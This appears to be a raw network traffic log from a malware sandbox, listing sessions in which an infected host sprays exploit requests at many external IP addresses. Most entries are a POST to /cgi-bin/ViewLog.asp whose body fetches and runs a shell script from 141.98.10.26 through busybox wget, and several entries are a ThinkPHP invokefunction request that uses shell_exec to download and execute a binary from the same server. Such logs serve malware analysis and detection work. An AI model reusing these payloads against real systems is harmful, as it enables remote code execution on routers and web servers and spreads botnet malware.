Nov 22, 2023 08:39:19.528713942 CET	10946	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.724817038 CET	10954	IN	HTTP/1.1 401 Unauthorized WWW-Authenticate: Basic realm="Kopano CalDav Gateway" Content-Length: 0 Server: Kopano Date: Wed, 22 Nov 2023 07:39:24 GMT Connection: Keep-Alive Keep-Alive: 300

Session ID	Source IP	Source Port	Destination IP	Destination Port
554	192.168.2.23	52058	85.206.51.127	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.541395903 CET	10947	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
555	192.168.2.23	44048	85.156.137.205	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.543457031 CET	10948	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
556	192.168.2.23	54510	94.122.205.189	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.571327925 CET	10950	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
557	192.168.2.23	37500	95.86.112.19	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.571639061 CET	10951	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
558	192.168.2.23	50904	31.136.106.41	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.702447891 CET	10954	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.263274908 CET	10963	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.415210009 CET	11175	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:23.910842896 CET	11440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.518100023 CET	11957	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:37.732800961 CET	13106	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.674179077 CET	15326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:33.533077002 CET	19724	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
559	192.168.2.23	50870	85.119.69.14	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.962587118 CET	10960	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.229568958 CET	10962	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:20 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
560	192.168.2.23	55668	88.210.17.83	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:20.517144918 CET	11007	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:20.744271040 CET	11072	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:39:19 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
561	192.168.2.23	60254	94.120.166.55	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:20.585810900 CET	11069	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
562	192.168.2.23	45458	112.126.102.82	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:20.641674995 CET	11070	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:20.966453075 CET	11075	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:20 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
563	192.168.2.23	38114	31.136.90.73	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:20.998505116 CET	11076	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.575086117 CET	11182	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:22.726924896 CET	11296	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:25.190542936 CET	11561	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:29.797909021 CET	12141	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:39.012619972 CET	13246	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721843004 CET	15621	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:35.580818892 CET	19756	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
564	192.168.2.23	52110	85.206.51.127	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:21.022933960 CET	11077	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
565	192.168.2.23	53992	31.200.109.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:21.039128065 CET	11078	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
566	192.168.2.23	32862	94.122.95.95	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:21.039268017 CET	11078	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
567	192.168.2.23	57462	94.122.123.219	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:21.039289951 CET	11079	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
568	192.168.2.23	48390	112.121.162.22	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:23.287925005 CET	11402	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
